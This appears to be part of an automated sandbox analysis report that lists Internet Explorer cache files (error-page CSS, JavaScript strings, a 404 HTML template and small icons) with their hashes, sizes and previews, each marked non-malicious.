                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:5+j5xU5k5N0ndgvoyeP0yyiyQCDr3nowMVworDtX3orKxWxDnCMA0da+hieyuSQK:5Q5K5k5pvFehWrrarrZIrHd3FIQfOS6
                                                                                                                                                                MD5:F4FE1CB77E758E1BA56B8A8EC20417C5
                                                                                                                                                                SHA1:F4EDA06901EDB98633A686B11D02F4925F827BF0
                                                                                                                                                                SHA-256:8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
                                                                                                                                                                SHA-512:62514AB345B6648C5442200A8E9530DFB88A0355E262069E0A694289C39A4A1C06C6143E5961074BFAC219949102A416C09733F24E8468984B96843DC222B436
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .body..{...font-family: "Segoe UI", "verdana", "arial";...background-image: url(background_gradient.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;...color: #575757;..}....body.securityError..{...font-family: "Segoe UI", "verdana" , "Arial";...background-image: url(background_gradient_red.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;..}....body.tabInfo..{...background-image: none;...background-color: #F4F4F4;..}.. ..a..{...color: rgb(19,112,171);.font-size: 1em;...font-weight: normal;...text-decoration: none;...margin-left: 0px;...vertical-align: top;..}....a:link, a:visited..{...color: rgb(19,112,171);...text-decoration: none;...vertical-align: top;..}....a:hover..{...color: rgb(7,74,229);...text-decoration: underline;..}....p..{...font-size: 0.9em;..}.....h1 /* used for Title */..{...color: #4465A2;...font-size: 1.1em;...font-weight: normal;...vertical-align
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\ErrorPageTemplate[2]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2168
                                                                                                                                                                Entropy (8bit):5.207912016937144
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:5+j5xU5k5N0ndgvoyeP0yyiyQCDr3nowMVworDtX3orKxWxDnCMA0da+hieyuSQK:5Q5K5k5pvFehWrrarrZIrHd3FIQfOS6
                                                                                                                                                                MD5:F4FE1CB77E758E1BA56B8A8EC20417C5
                                                                                                                                                                SHA1:F4EDA06901EDB98633A686B11D02F4925F827BF0
                                                                                                                                                                SHA-256:8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
                                                                                                                                                                SHA-512:62514AB345B6648C5442200A8E9530DFB88A0355E262069E0A694289C39A4A1C06C6143E5961074BFAC219949102A416C09733F24E8468984B96843DC222B436
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .body..{...font-family: "Segoe UI", "verdana", "arial";...background-image: url(background_gradient.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;...color: #575757;..}....body.securityError..{...font-family: "Segoe UI", "verdana" , "Arial";...background-image: url(background_gradient_red.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;..}....body.tabInfo..{...background-image: none;...background-color: #F4F4F4;..}.. ..a..{...color: rgb(19,112,171);.font-size: 1em;...font-weight: normal;...text-decoration: none;...margin-left: 0px;...vertical-align: top;..}....a:link, a:visited..{...color: rgb(19,112,171);...text-decoration: none;...vertical-align: top;..}....a:hover..{...color: rgb(7,74,229);...text-decoration: underline;..}....p..{...font-size: 0.9em;..}.....h1 /* used for Title */..{...color: #4465A2;...font-size: 1.1em;...font-weight: normal;...vertical-align
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\background_gradient[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):453
                                                                                                                                                                Entropy (8bit):5.019973044227213
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:3llVuiPjlXJYhg5suRd8PImMo23C/kHrJ8yA/NIeYoWg78C/vTFvbKLAh3:V/XPYhiPRd8j7+9LoIrobtHTdbKi
                                                                                                                                                                MD5:20F0110ED5E4E0D5384A496E4880139B
                                                                                                                                                                SHA1:51F5FC61D8BF19100DF0F8AADAA57FCD9C086255
                                                                                                                                                                SHA-256:1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
                                                                                                                                                                SHA-512:5F52C117E346111D99D3B642926139178A80B9EC03147C00E27F07AAB47FE38E9319FE983444F3E0E36DEF1E86DD7C56C25E44B14EFDC3F13B45EDEDA064DB5A
                                                                                                                                                                Malicious:false
                                                                                                                                                                IE Cache URL:res://ieframe.dll/background_gradient.jpg
                                                                                                                                                                Preview: ......JFIF.....d.d......Ducky.......P......Adobe.d................................................................................................................................................. ...............W..............................................................Qa.................................?......%.....x......s...Z.......j.T.wz.6...X.@... V.3tM...P@.u.%...m..D.25...T...F.........p......A..........BP..qD.(.........ntH.@......h?..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\bullet[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):447
                                                                                                                                                                Entropy (8bit):7.304718288205936
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:6v/71Cyt/JNTWxGdr+kZDWO7+4dKIv0b1GKuxu+R:/yBJNTqsSk9BTwE05su+R
                                                                                                                                                                MD5:26F971D87CA00E23BD2D064524AEF838
                                                                                                                                                                SHA1:7440BEFF2F4F8FABC9315608A13BF26CABAD27D9
                                                                                                                                                                SHA-256:1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
                                                                                                                                                                SHA-512:C62EB51BE301BB96C80539D66A73CD17CA2021D5D816233853A37DB72E04050271E581CC99652F3D8469B390003CA6C62DAD2A9D57164C620B7777AE99AA1B15
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .PNG........IHDR...............ex....PLTE...(EkFRp&@e&@e)Af)AgANjBNjDNjDNj2Vv-Xz-Y{3XyC\}E_.2j.3l.8p.7q.;j.;l.Zj.\l.5o.7q.<..aw.<..dz.E...........1..@.7..~.....9..:.....A..B..E..9..:..a..c..b..g.#M.%O.#r.#s.%y.2..4..+..-..?..@..;..p..s...G..H..M.........z`....#tRNS................................../,....mIDATx^..C..`.......S....y'...05...|..k.X......*`.F.K....JQ..u.<.}.. ..[U..m....'r%.......yn.`.7F..).5..b..rX.T.....IEND.B`.
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\down[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):748
                                                                                                                                                                Entropy (8bit):7.249606135668305
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                                                                                                                                                MD5:C4F558C4C8B56858F15C09037CD6625A
                                                                                                                                                                SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                                                                                                                                SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                                                                                                                                SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\errorPageStrings[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4720
                                                                                                                                                                Entropy (8bit):5.164796203267696
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                                                                                                                                                MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                                                                                                                                                SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                                                                                                                                                SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                                                                                                                                                SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                                                                                                                                                Malicious:false
Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\errorPageStrings[2]
Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:downloaded
Size (bytes):4720
Entropy (8bit):5.164796203267696
Encrypted:false
SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
MD5:D65EC06F21C379C87040B83CC1ABAC6B
SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
Malicious:false
IE Cache URL:res://ieframe.dll/errorPageStrings.js
Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\httpErrorPagesScripts[1]
Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:downloaded
Size (bytes):12105
Entropy (8bit):5.451485481468043
Encrypted:false
SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
MD5:9234071287E637F85D721463C488704C
SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
Malicious:false
IE Cache URL:res://ieframe.dll/httpErrorPagesScripts.js
Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\http_404[1]
Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:dropped
Size (bytes):6495
Entropy (8bit):3.8998802417135856
Encrypted:false
SSDEEP:48:up4d0yV4VkBXvLutC5N9J/1a5TI7kZ3GUXn3GFa7K083GJehBu01kptk7KwyBwpM:uKp6yN9JaKktZX36a7x05hwW7RM
MD5:F65C729DC2D457B7A1093813F1253192
SHA1:5006C9B50108CF582BE308411B157574E5A893FC
SHA-256:B82BFB6FA37FD5D56AC7C00536F150C0F244C81F1FC2D4FEFBBDC5E175C71B4F
SHA-512:717AFF18F105F342103D36270D642CC17BD9921FF0DBC87E3E3C2D897F490F4ECFAB29CF998D6D99C4951C3EABB356FE759C3483A33704CE9FCC1F546EBCBBC7
Malicious:false
Preview: .<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">....<html dir="ltr">.... <head>.. <link rel="stylesheet" type="text/css" href="ErrorPageTemplate.css">.... <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.... <title>HTTP 404 Not Found</title>.... <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:initHomepage(); expandCollapse('infoBlockID', true); initGoBack(); initMoreInfo('infoBlockID');">.... <table width="730" cellpadding="0" cellspacing="0" border="0">.... Error title -->.. <tr>.. <td id="infoIconAlign" width="60" align="left" valign="top" rowspan="2">.. <img src="info_48.png" id="infoIcon" alt="Info icon">..
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\http_404[2]
Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:dropped
Size (bytes):6495
Entropy (8bit):3.8998802417135856
Encrypted:false
SSDEEP:48:up4d0yV4VkBXvLutC5N9J/1a5TI7kZ3GUXn3GFa7K083GJehBu01kptk7KwyBwpM:uKp6yN9JaKktZX36a7x05hwW7RM
MD5:F65C729DC2D457B7A1093813F1253192
SHA1:5006C9B50108CF582BE308411B157574E5A893FC
SHA-256:B82BFB6FA37FD5D56AC7C00536F150C0F244C81F1FC2D4FEFBBDC5E175C71B4F
SHA-512:717AFF18F105F342103D36270D642CC17BD9921FF0DBC87E3E3C2D897F490F4ECFAB29CF998D6D99C4951C3EABB356FE759C3483A33704CE9FCC1F546EBCBBC7
Malicious:false
Preview: .<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">....<html dir="ltr">.... <head>.. <link rel="stylesheet" type="text/css" href="ErrorPageTemplate.css">.... <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.... <title>HTTP 404 Not Found</title>.... <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:initHomepage(); expandCollapse('infoBlockID', true); initGoBack(); initMoreInfo('infoBlockID');">.... <table width="730" cellpadding="0" cellspacing="0" border="0">.... Error title -->.. <tr>.. <td id="infoIconAlign" width="60" align="left" valign="top" rowspan="2">.. <img src="info_48.png" id="infoIcon" alt="Info icon">..
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\info_48[1]
Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):4113
Entropy (8bit):7.9370830126943375
Encrypted:false
SSDEEP:96:WNTJL8szf79M8FUjE39KJoUUuJPnvmKacs6Uq7qDMj1XPL:WNrzFoQSJPnvzs6rL
MD5:5565250FCC163AA3A79F0B746416CE69
SHA1:B97CC66471FCDEE07D0EE36C7FB03F342C231F8F
SHA-256:51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
SHA-512:E60EA153B0FECE4D311769391D3B763B14B9A140105A36A13DAD23C2906735EAAB9092236DEB8C68EF078E8864D6E288BEF7EF1731C1E9F1AD9B0170B95AC134
Malicious:false
Preview: .PNG........IHDR.../...0.......#.....IDATx^...pUU..{....KB........!....F......jp.Q.......Vg.F..m.Q....{...,m.@.56D...&$d!.<..}....s..K9.....{............[./<..T..I.I..JR)).9.k.N.%.E.W^}....Po..............X..;.=.P......./...+...9./..s.....9..|.......*.7v.`..V.....-^.$S[[[......K..z......3..3....5 ...0.."/n/.c...&.{.ht..?....A..I{.n.....|....t......N}..%.v...:.E..i....`....a.k.mg.LX..fcFU.fO-..YEfd.}...~."......}l$....^.re..'^X..*}.?.^U.G..... .30...X......f[.l0.P`..KC...[..[..6....~..i..Q.|;x..T ..........s.5...n+.0..;...H#.2..#.M..m[^3x&E.Ya..\K..{[..M..g...yf0..~....M.]7..ZZZ:..a.O.G64]....9..l[..a....N,,.h......5...f*.y...}...BX{.G^...?.c.......s^..P.(..G...t.0.:.X.DCs.....]vf...py).........x..>-..Be.a...G...Y!...z...g.{....d.s.o.....%.x......R.W.....Z.b,....!..6Ub....U.qY(/v..m.a...4.`Qr\.E.G..a)..t..e.j.W........C<.1.....c..l1w....]3%....tR;.,..3..-.NW.5...t..H..h..D..b......M....)B..2J...)..o..m..M.t....wn./....+Wv....xkg..*..
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\background_gradient[1]
Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3
Category:dropped
Size (bytes):453
Entropy (8bit):5.019973044227213
Encrypted:false
SSDEEP:6:3llVuiPjlXJYhg5suRd8PImMo23C/kHrJ8yA/NIeYoWg78C/vTFvbKLAh3:V/XPYhiPRd8j7+9LoIrobtHTdbKi
MD5:20F0110ED5E4E0D5384A496E4880139B
SHA1:51F5FC61D8BF19100DF0F8AADAA57FCD9C086255
SHA-256:1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
SHA-512:5F52C117E346111D99D3B642926139178A80B9EC03147C00E27F07AAB47FE38E9319FE983444F3E0E36DEF1E86DD7C56C25E44B14EFDC3F13B45EDEDA064DB5A
Malicious:false
Preview: ......JFIF.....d.d......Ducky.......P......Adobe.d................................................................................................................................................. ...............W..............................................................Qa.................................?......%.....x......s...Z.......j.T.wz.6...X.@... V.3tM...P@.u.%...m..D.25...T...F.........p......A..........BP..qD.(.........ntH.@......h?..
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\bullet[1]
Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
Category:downloaded
Size (bytes):447
Entropy (8bit):7.304718288205936
Encrypted:false
SSDEEP:12:6v/71Cyt/JNTWxGdr+kZDWO7+4dKIv0b1GKuxu+R:/yBJNTqsSk9BTwE05su+R
MD5:26F971D87CA00E23BD2D064524AEF838
SHA1:7440BEFF2F4F8FABC9315608A13BF26CABAD27D9
SHA-256:1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
SHA-512:C62EB51BE301BB96C80539D66A73CD17CA2021D5D816233853A37DB72E04050271E581CC99652F3D8469B390003CA6C62DAD2A9D57164C620B7777AE99AA1B15
Malicious:false
IE Cache URL:res://ieframe.dll/bullet.png
Preview: .PNG........IHDR...............ex....PLTE...(EkFRp&@e&@e)Af)AgANjBNjDNjDNj2Vv-Xz-Y{3XyC\}E_.2j.3l.8p.7q.;j.;l.Zj.\l.5o.7q.<..aw.<..dz.E...........1..@.7..~.....9..:.....A..B..E..9..:..a..c..b..g.#M.%O.#r.#s.%y.2..4..+..-..?..@..;..p..s...G..H..M.........z`....#tRNS................................../,....mIDATx^..C..`.......S....y'...05...|..k.X......*`.F.K....JQ..u.<.}.. ..[U..m....'r%.......yn.`.7F..).5..b..rX.T.....IEND.B`.
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\down[1]
Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
Category:dropped
Size (bytes):748
Entropy (8bit):7.249606135668305
Encrypted:false
SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
MD5:C4F558C4C8B56858F15C09037CD6625A
SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
Malicious:false
Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\errorPageStrings[1]
Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):4720
Entropy (8bit):5.164796203267696
Encrypted:false
SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
MD5:D65EC06F21C379C87040B83CC1ABAC6B
SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
Malicious:false
Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\httpErrorPagesScripts[1]
Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:dropped
                                                                                                                                                                Size (bytes):12105
                                                                                                                                                                Entropy (8bit):5.451485481468043
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                                                                                                                                MD5:9234071287E637F85D721463C488704C
                                                                                                                                                                SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                                                                                                                                SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                                                                                                                                SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\http_404[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):6495
                                                                                                                                                                Entropy (8bit):3.8998802417135856
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:up4d0yV4VkBXvLutC5N9J/1a5TI7kZ3GUXn3GFa7K083GJehBu01kptk7KwyBwpM:uKp6yN9JaKktZX36a7x05hwW7RM
                                                                                                                                                                MD5:F65C729DC2D457B7A1093813F1253192
                                                                                                                                                                SHA1:5006C9B50108CF582BE308411B157574E5A893FC
                                                                                                                                                                SHA-256:B82BFB6FA37FD5D56AC7C00536F150C0F244C81F1FC2D4FEFBBDC5E175C71B4F
                                                                                                                                                                SHA-512:717AFF18F105F342103D36270D642CC17BD9921FF0DBC87E3E3C2D897F490F4ECFAB29CF998D6D99C4951C3EABB356FE759C3483A33704CE9FCC1F546EBCBBC7
                                                                                                                                                                Malicious:false
                                                                                                                                                                IE Cache URL:res://ieframe.dll/http_404.htm
